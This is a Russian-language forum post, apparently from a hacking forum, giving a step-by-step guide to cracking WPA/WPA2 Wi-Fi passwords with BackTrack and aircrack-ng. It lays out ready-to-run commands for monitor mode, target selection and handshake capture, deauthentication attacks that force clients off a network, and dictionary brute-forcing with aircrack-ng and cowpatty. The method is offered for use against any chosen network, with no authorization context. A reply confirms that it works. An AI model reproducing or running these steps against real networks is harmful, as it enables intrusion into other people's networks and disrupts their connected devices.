Подбор ключа к WPA/WPA2 с BackTrack 3/4

tickhack

BANNED
Messages
66
Reputation
1
Reaction score
12
Points
8
Please note, if you want to make a deal with this user, that it is blocked.
Нам необходимо:
- Дистрибутив BT3/4 (USB, CD - не имеет значения)
- Адаптер, поддерживающий переход в режим монитора и пакетные инъекции. Cписок
- Словарь для подбора. Можно посмотреть тут.

1. Переводим адаптер в режим монитора

Наберите в консоли:

Code:
airmon-ng

72447028.png


Отобразиться список всех доступных WiFi адаптеров.
Выберите адаптер, который будете использовать.
В моем случае это wlan0 (Intel 3945 ABG).
После наберите
Code:
airmon-ng start [имя вашего адаптера]
и можем работать.

2. Выбор точки

Теперь мы будем искать точку с шифрованием WPA
Code:
airodump-ng --encrypt wpa [имя вашего адаптера]

Выбираем точку, предварительно переписав\скопипастив куда-нибудь её сетевое имя (ESSID), сетевой адрес (BSSID), и канал (CH).

3. Атака цели

Когда мы определились с целью, можно начинать атаку. Пишем

Code:
airodump-ng -w out -c [канал точки] --bssid [сетевой адрес точки] [имя вашего адаптера]

для сбора данных с точки и последующей атаки.
(-w это параметр записи пакетов в файл, т.е. имя файла вы можете выставить произвольное, если использовать указанное в данном примере, то файл на выходе будет называться out-01.cap).

Для подбора ключа нам нужен handshake (рукопожатие). Для того чтобы его “споймать”, нам либо остается ждать пока кто-нибудь не подключиться к точке и не скормит его нашему airodump'у. Но если на точке есть активный клиент, вы можете послать пакет для деавторизации клиента, что заставит его переподключиться.
Выглядеть это будет так:
36320712.png



Запишем куда-нибудь мак адрес клиента и откроем новую консоль, не закрывая эту.
Пишем

Code:
aireplay-ng -0 1 -a [сетевой адрес точки] -c [мак адрес клиента (Client Mac)] [имя вашего адаптера]

результат
41428517.png


Наш клиент удачно отсоединился от точки и наверное уже отдает нам handshake

Если клиентов нет, то будем использовать другой метод:
Code:
aireplay-ng -0 5 -a [сетевой адрес точки] [имя вашего адаптера]

Он не гарантирован, и не всегда срабатывает.
Это практически тот же метод, что указан выше, только на случай, если клиентов на точке нету...

Переходим в первую консоль, если airodump оповестит нас в правом верхнем углу, что у нас есть handshake, то можно приступать к следующему шагу...
Если вы не успели\не смогли\забыли увидеть оповещение, то пишем
Code:
aircrack-ng out-01.cap

если же handshake у нас, то вы увидите
40713833.png


4. Подбор ключа

После того, как handshake оказался у нас, можем начинать подбор.
Тут у нас есть два пути. Воспользоваться обычным методом, либо использовать программу cowpatty для генерации специального списка, что неплохо ускорит подбор.

Сначала рассмотрим первый способ.
Пишем
Code:
aircrack-ng -c out-01.cap -w [путь к словарю]

Все, подбор пошел.

15752463.png


Если ключ оказался в словаре, мы получим сообщение, что ключ найден.

Второй способ (CowPatty):
Создаем базу данных с помощью airolib-ng
Code:
airolib-ng wpadb init

после создайте в root текстовый файл, и вставьте туда сетевое имя точки. Назовите его "e.txt".
Теперь импортируем этот файл в базу данных
Code:
airolib-ng wpadb import ascii essid e.txt

потом импортируем словарь

Code:
airolib-ng wpadb import ascii passwd [путь к словарю]

Далее генерируем базу хешей, которые потом будут использоваться для подбора

Code:
airolib-ng wpadb batch

Это займет некоторое время. Если словарь большой, можно пойти выпить кофейку и т.д.
Когда процесс будет выполнен, экспортируем эту базу для использования в cowpatty

Code:
airolib-ng wpadb export cowpatty [сетевой имя точки] wpapmk

Теперь запускам процесс подбора.

Code:
cowpatty -s [сетевое имя точки] -d wpapmk -r out-01.cap

Опять же - если ключ был в словаре, то подбор удачен.

71413518.png


Ключ у вас, и вы можете использовать его по назначению.
Это все.
 
Messages
79
Reputation
1
Reaction score
6
Points
8
Всё верно описано подбирал так раньше.
 
Top